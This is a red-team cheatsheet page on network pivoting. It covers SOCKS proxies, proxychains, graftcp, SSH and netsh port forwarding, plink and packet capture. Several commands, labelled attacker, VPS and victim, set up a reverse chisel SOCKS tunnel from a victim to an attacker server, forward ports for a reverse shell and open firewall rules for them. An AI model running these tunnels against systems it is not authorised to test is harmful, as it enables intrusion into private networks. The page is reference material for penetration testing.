daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

network-pivoting-techniques.md (8130B)


      1 ---
      2 title: "Network Pivoting Techniques"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/pivoting/network-pivoting-techniques.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/pivoting/network-pivoting-techniques.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Network Pivoting Techniques
     12 
     13 ## SOCKS Proxy
     14 
     15 ### SOCKS Compatibility Table
     16 
     17 | SOCKS Version | TCP   | UDP   | IPv4  | IPv6  | Hostname |
     18 | ------------- | :---: | :---: | :---: | :---: | :---:    |
     19 | SOCKS v4      | ✅    | ❌    | ✅    | ❌    | ❌       |
     20 | SOCKS v4a     | ✅    | ❌    | ✅    | ❌    | ✅       |
     21 | SOCKS v5      | ✅    | ✅    | ✅    | ✅    | ✅       |
     22 
     23 ### SOCKS Proxy Usage
     24 
     25 #### Proxychains
     26 
     27 * [rofl0r/proxychains-ng](https://github.com/rofl0r/proxychains-ng) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project.
     28 * [haad/proxychains](https://github.com/haad/proxychains) - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy. Supported auth-types: "user/pass" for SOCKS4/5, "basic" for HTTP.
     29 
     30 Edit the **configuration file** `/etc/proxychains.conf` to add the SOCKS proxies.
     31 
     32 ```bash
     33 [ProxyList]
     34 # socks4 localhost 8080
     35 socks5 localhost 8081
     36 ```
     37 
     38 Uncomment `proxy_dns` to also proxify DNS requests.
     39 
     40 ```ps1
     41 proxychains nmap -sT 10.10.10.10
     42 proxychains curl http://10.10.10.10
     43 ```
     44 
     45 #### Proxifier
     46 
     47 Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains.
     48 
     49 * [proxifier](https://www.proxifier.com/) - The Most Advanced Proxy Client
     50 
     51 Open Proxifier, go to **Profile** -> **Proxy Servers** and **Add a new proxy entry**, which will point at the IP address and Port of your SOCKS proxy.
     52 
     53 Go to **Profile** -> **Proxification Rules**. This is where you can add rules that tell Proxifier when and where to proxy specific applications. Multiple applications can be added to the same rule.
     54 
     55 #### Graftcp
     56 
     57 * [hmgle/graftcp](https://github.com/hmgle/graftcp) - A flexible tool for redirecting a given program's TCP traffic to SOCKS5 or HTTP proxy.
     58 
     59 :warning: Same as proxychains, with another mechanism to "proxify" which allow Go applications.
     60 
     61 ```ps1
     62 # Create a SOCKS5, using Chisel or another tool and forward it through SSH
     63 (attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080:127.0.0.1:1080 root@IP_VPS
     64 (vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse 
     65 (victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks 
     66 
     67 # Run graftcp and specify the SOCKS5
     68 (attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5 127.0.0.1:1080
     69 (attacker) $ graftcp ./nuclei -u http://10.10.10.10
     70 ```
     71 
     72 Simple configuration file for graftcp: [example-graftcp-local.conf](https://github.com/hmgle/graftcp/blob/master/local/example-graftcp-local.conf)
     73 
     74 ```py
     75 ## Listen address (default ":2233")
     76 listen = :2233
     77 loglevel = 1
     78 
     79 ## SOCKS5 address (default "127.0.0.1:1080")
     80 socks5 = 127.0.0.1:1080
     81 # socks5_username = SOCKS5USERNAME
     82 # socks5_password = SOCKS5PASSWORD
     83 
     84 ## Set the mode for select a proxy (default "auto")
     85 select_proxy_mode = auto
     86 ```
     87 
     88 ## Port Forwarding
     89 
     90 ### SSH (native)
     91 
     92 | Pivoting Technique     | Command                                                          |
     93 | ---------------------- | ---------------------------------------------------------------- |
     94 | Local Port Forwarding  | `ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]`     |
     95 | Remote Port Forwarding | `ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]` |
     96 | Socks Proxy            | `ssh -N -f -D listenport [user]@[host]`                          |
     97 
     98 Inside an already established SSH session, press `~C` to opens an interactive mode to add local (-L), remote (-R), or dynamic (-D) port forwards. `-D` currently cannot be added after connection. Only `-L` or `-R` work reliably. Dynamic forwarding inside an existing session is not supported by OpenSSH.
     99 
    100 ```ps1
    101 ~C
    102 -L 1080:127.0.0.1:1080
    103 ```
    104 
    105 ### Netsh (native)
    106 
    107 ```powershell
    108 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
    109 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
    110 ```
    111 
    112 ```powershell
    113 # Forward the port 4545 for the reverse shell, and the 80 for the http server for example
    114 netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
    115 netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
    116 ```
    117 
    118 ```powershell
    119 # Correctly open the port on the machine
    120 netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
    121 netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
    122 netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
    123 netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
    124 ```
    125 
    126 1. listenaddress – is a local IP address waiting for a connection.
    127 2. listenport – local listening TCP port (the connection is waited on it).
    128 3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
    129 4. connectport – is a TCP port to which the connection from listenport is forwarded to.
    130 
    131 ### Custom Tools
    132 
    133 * [jpillora/chisel](https://github.com/jpillora/chisel)
    134 * [ginuerzh/gost](https://github.com/ginuerzh/gost)
    135 
    136     ```ps1
    137     gost -L=tcp://:2222/192.168.1.1:22 [-F=..]
    138     ```
    139 
    140 * [PuTTY/plink](https://putty.org/index.html)
    141 
    142     ```powershell
    143     plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
    144     plink -l root -pw toor -R 445:127.0.0.1:445 
    145     ```
    146 
    147 ## Network Capture
    148 
    149 ### TCPDump
    150 
    151 * [the-tcpdump-group/tcpdump](https://github.com/the-tcpdump-group/tcpdump)
    152 
    153 ```ps1
    154 # capture and save the output inside 0001.pcap
    155 tcpdump -w 0001.pcap -i eth0
    156 
    157 # capture and display packet in ASCII
    158 tcpdump -A -i eth0
    159 
    160 # capture every TCP packet on interface eth0
    161 tcpdump -i eth0 tcp
    162 
    163 # capture everything on port 22
    164 tcpdump -i eth0 port 22
    165 ```
    166 
    167 ### Netsh
    168 
    169 * Start a capture use the netsh command.
    170 
    171     ```ps1
    172     netsh trace start capture=yes report=disabled tracefile=c:\trace.etl maxsize=16384
    173     ```
    174 
    175 * Stop the trace
    176 
    177     ```ps1
    178     netsh trace stop
    179     ```
    180 
    181 * Event tracing
    182 
    183     ```ps1
    184     netsh trace start capture=yes report=disabled persistent=yes tracefile=c:\trace.etl maxsize=16384
    185     etl2pcapng.exe c:\trace.etl c:\trace.pcapng
    186     ```
    187 
    188 * Use filters
    189 
    190     ```ps1
    191     netsh trace start capture=yes report=disabled Ethernet.Type=IPv4 IPv4.Address=10.200.200.3 tracefile=c:\trace.etl maxsize=16384
    192     ```
    193 
    194 ## References
    195 
    196 * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
    197 * [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre ZANNI](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
    198 * [GO Simple Tunnel - Documentation](https://gost.run/en/)
    199 * [Ligolo-ng - Documentation](https://docs.ligolo.ng/)
    200 * [Overview of network pivoting and tunneling [2022 updated] - Alexandre ZANNI](https://blog.raw.pm/en/state-of-the-art-of-network-pivoting-in-2019/)
    201 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
    202 * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin - November 10, 2015](https://web.archive.org/web/20151205120607/https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
    203 * [Windows: Capture a network trace with builtin tools (netsh) - Michael Albert - February 22, 2021](https://michlstechblog.info/blog/windows-capture-a-network-trace-with-builtin-tools-netsh/)